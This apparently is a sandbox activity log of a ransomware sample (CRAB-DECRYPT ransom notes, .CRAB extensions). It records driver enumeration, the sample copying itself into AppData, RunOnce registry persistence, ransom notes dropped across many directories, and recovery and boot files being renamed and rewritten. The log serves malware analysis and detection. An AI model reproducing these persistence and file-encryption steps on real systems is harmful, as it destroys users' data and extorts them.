Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Driver Get Name load_address = 52051968 True 1
Fn
Driver Get Name load_address = 52174848 True 1
Fn
Driver Get Name load_address = 50331648 True 1
Fn
Driver Get Name load_address = 50515968 True 1
Fn
Driver Get Name load_address = 50831360 True 1
Fn
Driver Get Name load_address = 69742592 True 1
Fn
Driver Get Name load_address = 70422528 True 1
Fn
Driver Get Name load_address = 70467584 True 1
Fn
Driver Get Name load_address = 70668288 True 1
Fn
Driver Get Name load_address = 70742016 True 1
Fn
Driver Get Name load_address = 71630848 True 1
Fn
Driver Get Name load_address = 72257536 True 1
Fn
Driver Get Name load_address = 2009399296 True 1
Fn
Driver Get Name load_address = 1210908672 True 1
Fn
Driver Get Name load_address = 4294377472 True 1
Fn
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 4128768 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, type = size True 1
Fn
Driver Enumerate load_addresses = 1638000 True 1
Fn
Driver Enumerate load_addresses = 178257920 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Driver Get Name load_address = 52051968 True 1
Fn
Driver Get Name load_address = 52174848 True 1
Fn
Driver Get Name load_address = 50331648 True 1
Fn
Driver Get Name load_address = 50515968 True 1
Fn
Driver Get Name load_address = 50831360 True 1
Fn
Driver Get Name load_address = 69742592 True 1
Fn
Driver Get Name load_address = 70422528 True 1
Fn
Driver Get Name load_address = 70467584 True 1
Fn
Driver Get Name load_address = 70668288 True 1
Fn
Driver Get Name load_address = 70742016 True 1
Fn
Driver Get Name load_address = 71630848 True 1
Fn
Driver Get Name load_address = 72257536 True 1
Fn
Driver Get Name load_address = 2009399296 True 1
Fn
Driver Get Name load_address = 1210908672 True 1
Fn
Driver Get Name load_address = 4294377472 True 1
Fn
Driver Enumerate load_addresses = 1638012 True 1
Fn
Driver Enumerate load_addresses = 178257920 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe, size = 323593 True 1
Fn
Data
Module Unmap process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x760edf04 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = wuexvswrvdz, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe", size = 136, type = REG_SZ True 1
Fn
Thread 0xbb0
8380 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Config.Msi\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Config.Msi\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\MSOCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\MSOCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\Microsoft SQL Server Compact Edition\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\Microsoft SQL Server Compact Edition\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, destination_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 24576 True 1
Fn
Data
